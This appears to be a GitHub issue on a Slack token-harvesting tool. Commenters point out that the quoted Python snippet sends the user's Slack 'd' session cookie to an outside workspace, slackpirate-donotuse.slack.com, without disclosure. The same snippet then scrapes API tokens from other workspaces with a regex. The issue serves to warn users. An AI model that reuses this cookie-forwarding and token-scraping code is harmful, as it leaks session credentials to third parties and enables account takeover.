You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
r = requests.get("https://slackpirate-donotuse.slack.com", cookies=cookie)
already_signed_in_match = set(re.findall(ALREADY_SIGNED_IN_TEAM_REGEX, str(r.content)))
if already_signed_in_match:
for workspace in already_signed_in_match:
r = requests.get("https://" + workspace + "/customize/emoji", cookies=cookie)
regex_tokens = re.findall(SLACK_API_TOKEN_REGEX, str(r.content))
Doesn't it look suspicious to anyone that call to https://slackpirate-donotuse.slack.com get workspace could be replaced by additional argument where user passes workspace? There should be no need to pass your cookie to strangers!
It seems like this guy specializes in security so perhaps he was testing how many suckers would run unverified Python script!
When you use the
--cookie
option it sends thed
cookie to https://slackpirate-donotuse.slack.comIt is not clear from the readme that this will happen and what / if anything is in that slack workspace is captures all the d cookies submitted.
d
cookie is used when the--cookie
option is specifiedslackpirate-donotuse
workspace ?The text was updated successfully, but these errors were encountered: